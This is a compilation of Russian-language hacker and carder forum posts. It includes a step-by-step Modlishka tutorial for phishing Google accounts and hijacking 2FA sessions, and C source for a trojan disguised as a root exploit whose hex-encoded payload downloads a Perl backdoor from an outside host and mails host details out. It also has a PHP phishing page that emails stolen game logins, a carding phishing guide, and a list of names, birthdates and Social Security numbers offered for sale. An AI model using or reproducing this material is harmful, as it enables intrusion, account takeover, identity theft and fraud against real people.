Однако чем сложнее преодолеть защиту техническими методами, тем легче бывает это сделать социальной инженерией. Все настолько уверены в надежности 2FA, что используют ее для самых ответственных операций — от авторизации в Google (а это сразу доступ к почте, диску, контактам и всей хранимой в облаке истории) до систем клиент-банк.

При этом возможность обхода такой системы уже показывал австралийский исследователь Шабхэм Шах (Shubham Shah). Правда, его метод был довольно сложен в практической реализации. В нем использовалась авторизация по звонку, а не SMS, а предварительно нужно было узнать номер телефона жертвы и часть учетных данных. PoC был не особо убедительным, но наметил вектор атаки.

Modlishka
В начале 2019 года польский исследователь Пётр Душиньский (Piotr Duszyński) выложил в открытом доступе реверс-прокси Modlishka. По его словам, этот инструмент может обойти двухфакторную аутентификацию, что мы сейчас и проверим.

Если сравнить его с тем же [SEToolkit](https://github.com/trustedsec/social- engineer-toolkit) (он встроен практически во все популярные дистрибутивы для пентеста), то разница вот в чем: SET клонирует и размещает на локальном сервере страницу авторизации. Там все основано на работе скриптов, которые перехватывают вводимые учетные данные жертвы. Можно, конечно, настроить редирект на оригинальный сайт, но трафик от жертвы до твоего сервера будет незашифрованным. По сути, такого рода программы выступают в роли web-серверов с поддельным (фишинговым) сайтом.

Modlishka действует иначе. Генерируется свой сертификат, которым шифруется соединение от жертвы до нашего сервера (чтобы не палиться). Затем эта машина выступает в роли обратного прокси.

Другими словами, весь трафик идет на оригинальный сайт с инстанцией на нашем сервере. У хакера остаются учетные данные, и захватывается авторизованная сессия жертвы. Классическая MITM-атака, которую предваряет фишинг (нужно как- то заставить жертву установить поддельный сертификат и направить ее на фейковый сайт).

Статья написана в образовательных целях. Ни автор, ни редакция не несут ответственности за любой возможный вред, причиненный изложенными здесь материалами.

Поднимаем стенд
Давай поднимем сервер с Modlishka внутри локальной машины. Я сделаю это на примере Kali Linux, но принципиальной разницы для других дистрибутивов не будет — разве что слегка изменится путь к исходникам Go.

Вначале ставим Go — на этом языке написан реверс- прокси, и без Go он не скомпилируется.

Code:Copy to clipboard

$ apt-get install golang

Следом указываем путь к директории исходников:

Code:Copy to clipboard

$ export GOPATH='/root/go'

Проверить все можно командой

Code:Copy to clipboard

$ go env

В выводе должен быть указан GOPATH.

Вывод команды

Затем клонируем ветку с инструментом.

Code:Copy to clipboard

$ go get -u github.com/drk1wi/Modlishka
$ cd /root/go/src/github.com/drk1wi/Modlishka/

Создаем сертификат:

Code:Copy to clipboard

$ openssl genrsa -out secret.key 2048
$ openssl req -x509 -new -nodes -key secret.key -sha256 -days 1024 -out cert.pem

Теперь необходимо перенести содержимое ключа и сертификата в файл plugin/autocert.go и заменить значение двух переменных:

• const CA_CERT — значение сертификата (файл pem);
• const CA_CERT_KEY — значение ключа (файл key).

Файл autocert.go после замены сертификата

Теперь собираем все это дело:

Code:Copy to clipboard

$ make

Занимает компиляция от трех до десяти минут в зависимости от количества вычислительных ресурсов.

Сам запускаемый файл находится в директории dist/ под названием proxy. Для проверки можно запустить с ключом -h — вывод справки.

Code:Copy to clipboard

$ ./dist/proxy -h

Вывод справки программы Modlishka

Ловим учетные данные и сессию жертвы
Как я писал выше, чтобы создать прозрачный для жертвы шифрованный канал до нашего реверс-прокси, необходимо сперва экспортировать в браузер сертификат. Дальнейшие действия разбираются на примере Mozilla Firefox x64 v. 67.0.

Перед запуском взглянем внимательно на содержимое еще одного файла в директории templates. Нам интересен google.com_gsuite.json. Подробное описание каждого пункта можно найти в гайде по этому конфигу.

Содержимое файла google.com_gsuite.json

Есть два варианта запуска Modlishka: вручную и с помощью конфигурационного файла. Для запуска вручную минимальная команда выглядит так:

Code:Copy to clipboard

$ ./dist/proxy -target https://google.com -phishingDomain loopback.modlishka.io -listeningPort 443 -tls

Запуск с использованием конфигурационного файла:

Code:Copy to clipboard

$ ./dist/proxy -config /templates/google.com_gsuite.json

Запустим из конфига и перейдем в браузере по адресу loopback.modlishka.io. Нам откроется страница google.com. Входим в аккаунт и видим, как в выводе терминала появляются учетные данные жертвы.

Логин и пароль в выводе Modlishka

Если перейти по адресу loopback.modlishka.io/SayHello2Modlishka (очень символично), то получим консоль управления перехваченной сессией (в данный момент это бета-функция). На данном этапе мы перехватили логин и пароль жертвы безо всяких ошибок с шифрованием и в «защищенном» соединении. Насколько мне известно, другие инструменты аналогичного назначения такого не умеют.

Что же теперь делать с двухфакторной аутентификацией? А вот что: в панели управления есть незаполненное поле UUID, и эта цифра — ключ ко всему.

Если сразу нажать на кнопку Impersonate user (beta), то откроется пустая вкладка, и в консоли Modlishka нам подскажет, что нет UID пользователя. Его необходимо задать, а задается он в самом начале — указывается в ссылке на наш злой URL. Для этого вернемся к конфигурационному файлу.

Нам интересна строка "trackingParam": "ident". В ней необходимо задать значение ident, чтобы наш URL выглядел следующим образом:

Code:Copy to clipboard

https://loopback.modlishka.io/?ident=1

Именно на такой (или дополнительно обфусцированный) URL необходимо направить жертву.

На этот раз, после перехода и авторизации по такой ссылке, в панели управления (loopback.modlishka.io/SayHello2Modlishka) будет доступна сессия с заполненным UUID. Как именно это выглядит, я покажу чуть позже на реальном примере.

Теперь при нажатии на большую желтую кнопку мы увидим красивую синюю анимацию и через пять-десять секунд попадем в авторизованную сессию жертвы, невзирая на трудности двухфакторной авторизации. Жертва, как обычно, получит и введет подтверждающий код, видя зашифрованное соединение и настоящую панель авторизации Google, но не замечая вклинившегося посередине реверс-прокси Modlishka.

Хоть я и привел Wiki по всем параметрам конфигурационного файла, есть еще один момент. После того как жертва ввела учетные данные, желательно предотвратить выход из аккаунта и сохранить авторизованную сессию. Это делает параметр terminateTriggers. Если в этом параметре указать URL, на который попадет пользователь после успешной авторизации, то при появлении такого адреса весь трафик начнет перенаправляться на оригинальный URL, а авторизованная сессия не будет тронута даже после выхода из аккаунта.

Готовый комплект за NAT
Атаковать внутри одной машины или ЛВС оказалось не так сложно, а вот с подготовкой в качестве PoC «боевого» стенда в WWW у меня поначалу вышла заминка. Для него понадобится либо перенаправление на белый (внешний) IP- адрес, либо выделенный сервер с таким адресом. Арендовать сервер можно от 300 рублей в месяц. Для тестов я брал тут.

INFO
Когда я поднимал этот сервер на Kali Linux, проблем не было. На VDS стояла Ubuntu Server 16.4, и при установке Golang оказалось, что в указанных по умолчанию репозиториях лежит очень старая версия Go, которая при компиляции выдавала массу ошибок. В таком случае необходимо добавить актуальные репозитории Go и установить свежую версию.
Первая проблема заключается в доменном имени. Если перейти с компьютера жертвы на URL loopback.modlishka.io, то ничего не выйдет, так как внешние и неподконтрольные нам DNS не знают такого адреса. Если же перенаправить на IP- адрес машины с Modlishka, то жертва попадет прямиком на страницу Google, минуя прокси-сервер, а в выводе терминала увидим две строки:

Code:Copy to clipboard

Host 192.168.1.15 does not contain the phishing domain
Redirecting client to google.com

Если жертва в той же локальной сети, то можно задать соответствие IP — URL в местном DNS или в ее файле hosts. В моем случае это было так:

Code:Copy to clipboard

192.168.1.15 loopback.modlishka.io

В интернете я сначала попробовал зарегистрировать бесплатный домен 3-го уровня. Предполагал, что этого хватит, но не тут-то было! При переходе оказывалась лишь страница, что сайт недоступен, а при вводе IP-адреса через HTTPS редиректило на Google. По простому HTTP и вовсе открывалась приветственная страница Apache.

Как обычно, дьявол кроется в деталях. При переходе по URL в глобальной сети автоматом добавляется префикс www, а программа ждала чистого обращения к домену. Добавление www в конфиг не помогло, и пришлось добывать в свои владения полный пул поддоменов. Другими словами, если домен выглядит как loopback.modlishka.io, то иметь необходимо *.loopback.modlishka.io.

Следующая загвоздка касается сертификатов. Необходимо на зарегистрированный домен сделать сертификат и ключ. В идеале необходимо подписывать сертификат в удостоверяющем центре, но для теста можно использовать и самоподписанный.

Идем на любой [генератор сертификатов](https://regery.com.ua/ru/security/ssl- tools/self-signed-certificate-generator), делаем и скачиваем два файла. Их содержимое надо подставить в конфигурационный файл Modlishka соответственно полям "cert": "" и "certKey": "". Небольшая ремарка: сертификат и ключ должны указываться в одну строку, а перенос строки, как обычно, задается последовательностью \n.

Выглядеть должно примерно так:

Code:Copy to clipboard

"cert": "-----BEGIN CERTIFICATE-----\nMIIDJTCCAg2gAwIBAgIESjdT0DANBgkqhkiG9w0BAQsFADApMScwJQYDVQQDDB5SZWdlcnkgU2Vs\n...".

Также в конфигурационном файле нам необходимо изменить пару других параметров:

• "phishingDomain": "loopback.modlishka.io" — тут вместо loopback.modlishka.ioподставляем свой домен;
• "listeningAddress": "127.0.0.1" — нужно заменить на 0.0.0.0, иначе прослушивается лишь lo-интерфейс, а работать все будет только внутри локальной машины.

Modlishka каждый раз разворачивается для конкретных доменных имен. Поэтому лучше изначально регистрировать доменное имя, затем получать сертификат и только потом разворачивать техническую часть. В таком случае можно импортировать содержимое сертификатов в autocert.go, и прописывать ключ с сертификатом в файл конфигурации уже не потребуется.

Взломать хакера
Этот стенд я тестировал с редактором журнала «Хакер» Андреем Васильковым, который выступал в роли очень наивной жертвы. На google.com адрес моего домена ничуть не похож, но мы решили пропустить обфускацию. Об этом уже была отдельная статья, и не одна.

Результаты совместного эксперимента можно увидеть на скриншотах. Андрей находился в другом городе и ~~поэтому ничего не мог мне сделать~~ подключался через другого провайдера, заходя на мой фишинговый сайт через десктопный Firefox v. 67.0.

Сначала он скачал поддельный сертификат моего домена (он похож на домен банка) и установил его в браузере. В реальной жизни мотивировать на такой отчаянный поступок можно под видом заботы о безопасности (хе-хе), промоакции или сыграть на жадности/страхе тысячью одним другим способом.

Жертва ставит сертификат

В адресной строке творится безобразие, но мало кто в нее смотрит (на мобильных браузерах она вообще скрывается для экономии места на экране). Зеленый замочек «защищенного» соединения вселяет уверенность, а панель авторизации Google вообще загружается оригинальная.

Ловушка для невнимательных

Первый этап прошел успешно — Андрей ввел свой логин и пароль, после чего Google отправил ему одноразовый код подтверждения в SMS.

Запрос кода подтверждения

Меньше чем через минуту Андрей вводит его в стандартное поле верификации. Он вошел в свой аккаунт… и я тоже!

Полный перехват авторизации

После этого мне открылась полная свобода действий. Почта, диск, контакты, история браузера, история географических перемещений, списки установленных приложений, сохраненные пароли точек доступа Wi-Fi и бэкапы. Просто цифровой Клондайк!

Взломанная почта

Самое главное — удалось перехватить активную сессию.

Панель управления Modlishka

Важное примечание: если аккаунт используется на смартфоне, то пользователю отправится push-уведомление о том, что был совершен вход в аккаунт с нового устройства. Однако у хакера есть время войти в почту и удалить это письмо. Для жертвы все будет выглядеть как глюк системы уведомлений, если она вообще на него среагирует.

Выводы
Сессия в панели управления Modlishka очень живучая. Она не умирает до тех пор, пока из нее самой не выйдет пользователь (либо хакер). То есть, если жертва закроет вкладку, авторизованная сессия останется активной. Если заново авторизоваться напрямую на google.com, а потом выйти из аккаунта, то сессия все равно останется живой. Даже если остановить сервер Modlishka и запустить его заново — сессия все равно остается. Есть только одна гарантированная возможность деавторизации — выйти в тот момент, когда только «редиректишься» на прокси.

Хоть в статье и были описаны технические детали, обход 2FA не сработает без социальной инженерии. Нужно замаскировать сайт и как-то установить сертификат на компьютер жертвы. Впрочем, это может оказаться не так уж сложно. Большинство пользователей охотно выполняют инструкции, начинающиеся со слов «отключите антивирус и файрвол», а уж в установке сертификата мало кто из обывателей увидит потенциальную опасность.

Автор 8bit (c)xakep.ru

Такс сейчас я изложу одну достаточно эфективную схему фишинга ....
А улов мы будем на сей раз собирать не с ушастых юзверей а с админов хостингов , мерчант сервисов, ну и прочих интерестных вещей) ......

Начнем с того что запасемся приличным маил листом нащих жертв (имеются ввиду список маилов админов которых будем разводить)

Понятное дело что администратор сервера как правило человек образованный , подозрительный и технически подкованный ... поэтому работать нужно окуратно и чотко.
Для начала регним домен из ряда security-problems.org, security-kernel.us ну и в таком плане а также создадим мыльник на нашем свежеиспечонном домене support@security-problem.org (беру в качестве примера)

а теперь приготовимся готовить ширму для наших ушастых )
Что будем использовать в качестве ширмы? ... а использовать будем "эксплоит для использования локальной уязвимости системы"
Который вместо того чтобы чекнуть систему на наличие бага сделает то что нам нужно (к примеру сольет с хостинга бекдор и запустит его на ремотной машине) Наш сплоит нужно написать так чтобы умный ушастый не сообразил истинность его действий ....
Вот к этому сейчас и приступим .
Для начала определим набор комманд которые должен будет выполнить нас сплоит .....

Code:
which wget -P/tmp http://ourhost.com/shell.pl;perl /tmp/shell.pl;
rm /tmp/shell.pl;echo "whoami@hostname -i"| mail uormail@usa.com
Этот набор комманд сливает скрипт бекдора shell.pl запускает его ..... и шлет на наш почтовый адрес информацию вида @ ..... больше сообственно нам ничего и не нужно . Теперь встает вопрос как сделать так чтобы скрыть эти комманды в теле нашего сплоита ? .. отвечаю ..... закодируем их в HEX и подадим в качестве SHELL - кода ... нашего сплоита)
утилу для кодирования набора комманд в HEX напишим сами .... ее код

Code:
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define EOF -1

main()

{
char c;

while ((c = getchar())!= EOF)
printf("\\x%X", c);
}

теперь пусть файл shell.txt содержит наш набор комманд ... кодируем его в HEX

Code:
type shell.txt | HEX.exe > shell_codeготово .... теперь посмотрим как выглядит наш набор комманд после кодирования в HEX

Code:
\x60\x77\x68\x69\x63\x68\x20\x77\x67\x65
\x74\x60\x20\x2D\x50\x2F\x74\x6D\x70\x20
\x68\x74\x74\x70\x3A\x2F\x2F\x6F\x75\x72
\x73\x69\x74\x65\x2E\x63\x6F\x6D\x2F\x73
\x68\x65\x6C\x6C\x2E\x70\x6C\x3B\x70\x65
\x72\x6C\x20\x2F\x74\x6D\x70\x2F\x73\x68
\x65\x6C\x6C\x2E\x70\x6C\x3B\x72\x6D\x20
\x2F\x74\x6D\x70\x2F\x73\x68\x65\x6C\x6C
\x2E\x70\x6C\x3B\x65\x63\x68\x6F\x20\x22
\x60\x77\x68\x6F\x61\x6D\x69\x60\x40\x60
\x68\x6F\x73\x74\x6E\x61\x6D\x65\x20\x2D
\x69\x22\x7C\x20\x6D\x61\x69\x6C\x20\x6F
\x75\x72\x6D\x61\x69\x6C\x40\x75\x73\x61
\x2E\x63\x6F\x6D\xA
ну епт) чем вам не настоящий шел код настоящего сплоита)))комар носа не подточит)) ... декодирование этой штуки произйдет ещо проще)) .... декодирование мы произведем в самом сплоите) .... теперь примимся за кодинг)

Code:
#include <stdio.h>
#include <stdlib.h>

char shellcode[] =

"\x60\x77\x68\x69\x63\x68\x20\x77\x67\x65"
"\x74\x60\x20\x2D\x50\x2F\x74\x6D\x70\x20"
"\x68\x74\x74\x70\x3A\x2F\x2F\x6F\x75\x72"
"\x73\x69\x74\x65\x2E\x63\x6F\x6D\x2F\x73"
"\x68\x65\x6C\x6C\x2E\x70\x6C\x3B\x70\x65"
"\x72\x6C\x20\x2F\x74\x6D\x70\x2F\x73\x68"
"\x65\x6C\x6C\x2E\x70\x6C\x3B\x72\x6D\x20"
"\x2F\x74\x6D\x70\x2F\x73\x68\x65\x6C\x6C"
"\x2E\x70\x6C\x3B\x65\x63\x68\x6F\x20\x22"
"\x60\x77\x68\x6F\x61\x6D\x69\x60\x40\x60"
"\x68\x6F\x73\x74\x6E\x61\x6D\x65\x20\x2D"
"\x69\x22\x7C\x20\x6D\x61\x69\x6C\x20\x6F"
"\x75\x72\x6D\x61\x69\x6C\x40\x75\x73\x61"
"\x2E\x63\x6F\x6D\xA"

//описали масив с шел кодом

#define LSIZE 256
#define BUFSIZE 2000

int main(int argc, char *argv[])
{
char *buf;

if (argc != 2) {

//Это так сказать для пущей уверености что перед ушастым именно сплоит
//при чом сплоит какойто новенький

printf("\nLocal r00t exploit for Linux kernel 2.4.20-2.4.27,2.6.*\n");
printf("Tested on Linux Enterprise 3, Red Hat Linux 9.2, Mandrake Linux 10");
printf("\n - ret addr for Enterprise Linux : 0x1f4c00\n");
printf("\n - ret addr for Red Hat Linux : 0x1d3fa5\n");
printf("\n - ret addr for Mandrake Linux : 0x2f4d56\n");
printf("\n-b : brute mode");
printf("Usage: %s -r [ret addr] [-b]\n\n", argv[0]);
exit(1);
}

//дальше помещаем наш шел-код в память одновременно преобразуя его
//к нормальному виду

buf = (char *) malloc(LSIZE + BUFSIZE + 100);
memcpy(&buf[LSIZE - strlen(shellcode)], shellcode, strlen(shellcode));

//а тут пишем как можно больше логически правильной
//лабуды)) ее я писать не буду) дайте волю фантази

//и наконец выполнение нужных нам действий

if (fork() == 0)
execl("/bin/sh", "sh", "-c", shellcode, 0);while(1);
}
ну что со сплоитом справились ..... теперь приступаем к спаму .....
письмо буим слать вида
"МЫ мол трудолюбивая секьюрити-организация интузиастов кодеров хатим мир во всем мире и искоренить хакеров ..." ну и в подобном ключе)
берем наш маил-лист и спамим -спамим-спамим ..... а потом раскидываемся в кресле открываем бутылочку пива и ждем уведомлений от наших бекдоров))
Удачи)) ...

P.S. Метод на практике показал достаточно высокие результаты и показатели) дерзайте
статья взята с https:\\mazafаka.info

Скамы (SCAM) - фейки сайтов,создаваемые с целью сбора вводимой информации,будь то идентификационные данные либо какая-то ценная информация.Зачастую скамы играют на руку кардерам - нередки случаи создания липовых шопов.

Создание скама зачастую сводится к изменению скрипта-обработчика таким образом,чтобы данные отсылались не на оригинальный сайт,а собирались в файле либо сразу отсылались на почту к злоумышленику.Дизан таких сайтов ничуть не отличается от их братьев-оригиналов и заподозрить неладное может только опытный пользователь или же сам проект вводит защиту от фишинга.Yahoo предлагает вводить заведомо введенные данные при аутенфикации или например использовать форму логина заданного цвета.Firefox второй ветки сравнивает сайт с черным списком и в случае обнаружения поддельного сайта извещает юзера и не дает ввести данные.Internet Explorer такжи имеет защиту,но фильтр надо качать отдельно ( http://g.msn.com/8SEENUS020100/AddinsPhish...and_downloadURL )

Для примера создадим грамотный фейк популярной онлайн-игры ganjawars.ru.Скрипт будет не только собирать введенную информацию,но и проверять подлинность введенных данных,и в случае существования введенного юзера и правильности логина и пароля перебрасывать его на страницу с неправильно введенным паролем чтобы не вызывать подозрения.

Для начала сохраним страницу к себе на жесткий диск и посмотрим куда идут введенные логин с паролем.

Изменяем поле обработчика action с удаленного http://www.ganjawars.ru/login.php на локальный login.php.Снифаем запрос логина.В случае правильной связки вводимых данных сервер ответит 302 Found,в обратном - "Неверно указан пароль",если же логин не существует - "Неверно указан никнейм".

Code:Copy to clipboard

<?php
# обьявяем переменные
define ( _Mail,"gemaglabin@asechka.ru");
define ( _Subj,"New ganjawars account");
# данные переданы,начинаем процедуру логина
if (isset($_POST['login']) && isset($_POST['pass']))
{
# коннектимся к ganjawars.ru 
 $fsock = fsockopen("ganjawars.ru",80,$err,$errdesc,3);
# формируем запрос
 $params   = "login=".$_POST['login']."&pass=".$_POST['pass'];
 $request  = "POST /login.php HTTP/1.1\r\n";
 $request .= "User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.8.0.6) Gecko/20060728 Firefox/1.5.0.6\r\n";
 $request .= "Accept-Language: ru-ru,ru;q=0.8,en-us;q=0.5,en;q=0.3\r\n";
 $request .= "Referer: http://ganjawars.ru/login.php\r\n";
 $request .= "Content-Type: application/x-www-form-urlencoded\r\n";
 $request .= "Host: ganjawars.ru\r\n";
 $request .= "Content-Length: ".strlen($params)."\r\n";
 $request .= "Connection: Keep-Alive\r\n\r\n";
 $request .= $params;
# отсылаем запрос
 fwrite($fsock,$request); 
# принимаем ответ сервера
 while (!feof($fsock))  $responce .= fgets($fsock,1024);
# обрабатываем ответ
 if (strpos($responce,"302 Found")) 
 {
  $msg = "New account : ".$_POST['login']." : ".$_POST['pass'];
  mail (_Mail,_Subj,$msg,"From: admin@ganjawars.ru");
  $fd  = fopen("_login.php","r");
  $log = fread($fd,filesize("_login.php"));
  fclose($fd);
  echo $log;
 }
 
 if (strpos($responce,"Неверно указан никнейм"))
 {
  $responce = substr($responce,strpos($responce,"<"));
  print $responce;
 }
 if (strpos($responce,"Неверно указан пароль")) 
 { 
 $responce = substr($responce,strpos($responce,"<"));
 print $responce;
 }
}

В случае правильного пароля мы отсылаем его на заданное мыло и показываем содержимое файла _login.php где четко говорится что пароль указан неверно (предварительно мы сохранили этот файл - сделали запрос с заведомо неправильным паролем ).Если же юзер не существует или пароль неверен выводим ответ сервера отделенный от хидера,где обработчик формы будет уже на оригинальном сервера ganjawars.ru

Скрипт прекрасно работает и рядовой юзер врядли догадается что его обманывают.Не стоит забывать о мелочах.Несоответствие времени , логотипа или новостей может вызвать подозрение.Универсальный вариант - загрузка оригинальной страницы и замена скрипта обработчика на лету.EOF

Fake (фэйк) - подделка, обман. Слово фэйк используется в разных ситуациях и терминологиях, но смысл при этом остаётся неизменным.

Нас, кардеров, интересует всё что связанно с Интернетом и чужими деньгами. Что нам нужно для получения чужих денег? Правильно, приватная информация! Что подразумевает понятие «приватная информация» думаю все знают. Итак, какая она бывает и где же её достать??
Начнём по порядку: сколько раз в неделю John Smith занимается сексом это приватная информация, но она (по крайней мере мне) не нужна, а вот номер его кредитки, логин и пароль от e-gold, ebay, почты, банковского аккаунта, и т.д. может пригодится ;-).
Вопрос номер два. Где и как достать эту информацию?
Тут как всегда есть 2 варианта:

1. купить;
2. достать самому;

Как и у кого покупать приватную информацию рассказывать пожалуй не стану, а перейду сразу ко второму варианту.
Итак, как самому достать информацию, о которую не знают даже родственники владельца? Как получить пароли которые в голове у хозяина?? Как узнать ID который он вводит только на сайте банка???

Речь идет о фишинге. Что это такое?
Само слово "фишинг" происходит от английского fishing, что, в свою очередь, переводится как рыбалка. И в этом нет ничего удивительного.
Фишинг - это особый вид мошенничества в Глобальной сети, очень похожий на рыбную ловлю. Нужно всего лишь закинуть приманку и "вылавливать" всех "рыбок"-интернетчиков, которые на нее клюнут.

Сегодня существует три вида фишинга - почтовый, онлайновый и комбинированный.
Первый из них самый старый. Он заключается в отправке жертве специального письма по электронной почте с требованием выслать в ответ какие-либо данные. Это полный бред, никогда не занимался такой ерундой и вам не советую, эффективность этого вида стремится к 0. Перейдём сразу ко второму:
Под онлайновым фишингом подразумеваются аферы, когда фишеры копируют какие- либо сайты, например интернет-магазины. При этом они используют похожие доменные имена и идентичный дизайн, такой поддельный сайт и называет ФЭЙКОМ. Ну а дальше происходит следующее. Допустим, жертва, попавшая в такой магазин, решила приобрести какой-либо товар. Причем число таких людей достаточно велико. Ведь мы будем предлагать различные вещи за копейки (привет Эльдорадо!). Ну а подозрения, которые могли бы возникнуть у потенциальных жертв, рассеиваются благодаря известности копируемого сайта. Все-таки люди считают, что они находятся на веб-сервере реально действующего и имеющего хорошую репутацию магазина (банка, почтового сервера и т.д.). Решив приобрести товар, жертва регистрируется в системе. При этом есть достаточно большая вероятность того, что для этого он использует точно такой же пароль, как и в других сервисах (многие люди всегда используют одно ключевое слово (логин, пароль), несмотря на все предупреждения со стороны специалистов по информационной безопасности). Кроме того, для покупки товара жертва введет номер и прочие данные своей пластиковой карты (либо какую то другую приват инфу). А именно это нам и нужно!
Конечно это здорово, но всё равно далеко не каждый повётся на такую приманку.
Поэтому на смену онлайн-фишинга пришёл третий тип фишинга, комбинированный.
Суть этого способа обмана заключается в следующем. Создается ФЭЙК сайт какой- либо организации, а затем завлекаются на него пользователи.
Как завлекаются? Лично мне известны 2 хороших варианта:

1. Спам
2. Трой

Расскажу как фишить спамом.
В тексте письма жертве должно всего лишь предлагаться зайти на корпоративный сайт по приведенной ссылке (ссылка разумеется на фэйк) и самому произвести необходимые операции. Так, например, однажды многие владельцы пластиковых карт одного из крупных банков получили особое электронное письмо. В нем было написано примерно следующее: "Сегодня на ваш счет пришел перевод, сумма которого превышает 1000 долларов. В соответствии с нормативными актами и договором вам необходимо подтвердить его получение. Если в течение трех суток вы этого не сделаете, деньги будут отправлены обратно. Для того чтобы подтвердить получение перевода, откройте ссылку в конце этого письма и введите необходимую информацию". Под необходимой информацией, естественно, подразумеваются номер пластиковой карты, срок ее действия, наличие или отсутствие овердрафта и т. п. И многие люди не смогли перебороть свою жадность, оставив важную информацию на растерзание фишеру.

Фишить троем конечно проще, в плане затрат времени на написание писем и подбора спам баз, но сложнее в плане…
Итак, что должен делать трой? Всё очень просто, при запросе определенного УРЛ, он должен открывать не реальный сайт а наш фэйк при это в адресной строке обозревателя отображать урл реального сайта. При таком подходе стоит подумать, сколько фэйков нужно делать? Разумеется чем больше тем лучше, фэйки нужно подбирать и делать после того как известна локация трафа который будет заражаться вашим троем. Например вы покупаете 1к загрузок по Канаде. Стоит поинтересоваться какие банки наиболее распространенны среди канадцев и что хорошо фишится. Или наоборот, определившись с тем, какую информацию и откуда вы собираетесь фишить, подбирать трафф.

Это теже самые вирусы только в отличе от обычных вирусов они не уничтожают ваши данные на винте, они не остаються на вашем винте до тех пор пока вы его не отформатируете, но они остаются у вас в голове и уничтожают ваш мозг. Они такие же бессмысленые как эти вирусы т.к. никакой рекламы они не несут, только портят нервы обычных пользователей.

Spoiler: 1000

(господи, во чушь какую сказал, пред открытием раздела либо удалить либо подкоректить)

Вот пример:

Теперь каждый человек, у которого в контакт листе более 35 контактов, будет считаться VIP-пользователем. Цветок этого пользователя станет золотым. Для того чтобы активизировать эту функцию отправьте это сообщение всем своим 35+ контактам

Click to expand...

350 free private Name | DOB | SEX | SSN see my other thread for sales

[CLIKE]FACKRELL BRADLEY DEVON 19661113 Male 528373326
BUNDERSON JOHN STUART 19661121 Male 528172104
LINDGREN MARGITTA E 19661204 Female 528499772
SMITH MICHAEL PATRICK 19661208 Male 528251804
DAY TRICIA L 19661213 Female 528040658
BILLIN CAMI R 19661214 Female 528987491
JOHNSON RONALD BLANE 19661214 Male 528087262
GOOCH PAUL R 19661231 Male 528352394
ANSON RONALD EDWARD 19670101 Male 528432311
WINDER WAYNE E 19670104 Male 528352588
BAKER DEBORAH M 19670107 Female 528432968
JOYCE JEFFREY T 19670122 Male 528315559
STURGIS JEFFREY KIM 19670203 Male 528314430
JOHNSON WENDELL ROBERT 19670210 Male 528374794
CRUZ ABRAHAM H 19670214 Male 528417290
FULLMER DOUGLAS D 19670224 Male 528435477
ROE JULIE MAY 19670228 Female 528216947
DOXEY DAVID E 19670307 Male 528847881
MILLER LESA RENEE 19670308 Female 528390543
WEST CARLA R 19670331 Female 528179862
BUSH DAVID SHAWN 19670414 Male 528331349
WALLIN ANTHONY R 19670414 Male 528430962
JORGENSEN ERIK LEE 19670416 Male 528115925
HUMBLE BYRON JAY 19670418 Male 528312635
VANLEEUWEN CATHERINE W 19670425 Female 528355765
MCALLISTER RACHAEL NOEL 19670501 Female 528294124
BRUNS WYNETTE 19670505 Female 528419374
ETTER TIFFIN T 19670508 Female 528353269
WRIGHT JORDAN WILLIS 19670513 Male 528271228
HADFIELD RANDAL L 19670514 Male 528336952
SIEGEL TIFFANY R 19670601 Female 528233094
PRIESTLEY TAMARA L 19670604 Female 528457951
BASHRUM TOMMY JOE 19670606 Male 528437015
GESS JAMES PATRICK 19670610 Male 528049414
HARSHBARGER GANIA NATHALIE 19670618 Female 528853410
REED JOHN NOLAN 19670708 Male 528802486
BROADBENT MARY CATHERINE 19670716 Female 528336432
STAROSTKA ANDREW B 19670724 Male 528067938
AFANA USAMA MOHAMMED 19670725 Male 528555481
MEADOWS BRYAN ALLPHIN 19670726 Male 528493936
ZIMMERMAN PATRICK HARDIN 19670727 Male 528510070
MCGEE CORRINA SHINER 19670806 Female 528113656
POUNDS LAUREL 19670811 Female 528417153
CULKIN WILLIAM R 19670818 Male 528981500
WEBB JAMES D 19670823 Male 528353856
KUNNEMANN PETULA ANN 19670902 Female 528025906
WHITAKER RICHARD M 19670902 Male 528395547
KONOLD JENNIFER L 19670914 Female 528177667
ZIMMERMAN LISA SODERBERG 19670914 Female 528393844
MCDONALD LANCE C 19670921 Male 528537017
DURHAM KIMBERLY ANN 19670927 Female 528217504
NEBEKER BRIAN CLIFFORD 19670927 Male 528066081
KIRKPATRICK WILLIAM R 19671002 Male 528338928
MILLS JAMES PATRICK 19671003 Male 528172003
DEPRIEST HEATHER 19671011 Female 528867202
YOUNG STACY G 19671011 Male 528350906
WAGSTAFF JAMES L 19671016 Male 528907912
HOOPES ROBIN L 19671019 Female 528335230
GROGAN ARCHIE THOMAS 19671102 Male 528086615
THORNE ELEANOR T 19671110 Female 528538988
HILL DALE R 19671111 Male 528435529
BECKER VICKIE R 19671121 Female 528158974
MEMMOTT STEPHANIE A 19671124 Female 528966472
NORIEGA JOHN EUGENE 19671125 Male 528412217
GOLDSBERRY BART LEE 19671126 Male 528151803
BERGSTEDT-BROWN ELLEN B 19671201 Female 528410962
JONES FRANKLIN EUGENE 19671205 Male 528215838
FRIEND RICHARD S 19671209 Male 528949155
COLLINS DEBRA MERLE 19671221 Female 528086076
JACINTHO CRAIG 19680126 Male 528217437
PARRISH LISA ANN 19680130 Female 528133716
BROWN BRENDA LEA 19680205 Female 528067732
WUNDER ELIZABETH MARIE 19680212 Female 528471288
BASS DEANN P 19680304 Female 528394045
EPPERLEY PAUL V 19680304 Male 528967036
COX MATTHEW ALLAN 19680312 Male 528085361
SMITH KAYE MARIE 19680328 Female 528476891
LOWE JULIA B JENNINGS 19680413 Female 528237677
DICKEY MICHELE 19680416 Female 528884347
BLAKE LISA M 19680425 Female 528960164
LANDRAM SEAN GARY 19680502 Male 528472192
CHUGG CHRISTIAN ROBERT 19680506 Male 528219939
BUSH ERIC C 19680522 Male 528351735
HUBER ALICE OVESON 19680523 Female 528234776
LACINA DONALD SCOTT 19680524 Male 528945022
FULLMER DANIEL RICHARDS 19680526 Male 528413774
BAKER LISA K 19680528 Female 528497938
COOPER TINA MARIE 19680529 Female 528118964
HOWELLS AMY JO 19680605 Female 528359659
HONEY SHARON R 19680615 Female 528392555
MAKKAWITA JAYAKA CHAMINDA 19680628 Male 528874858
COLE RHONDA J 19680716 Female 528239345
BASHRUM WAYLAN EUGENE 19680717 Male 528435067
MCGINLEY MARY KELLEY 19680722 Female 528572459
ENKE MICHAEL SHAWN 19680723 Male 528494396
HONEY MARK RICHARD 19680725 Male 528398892
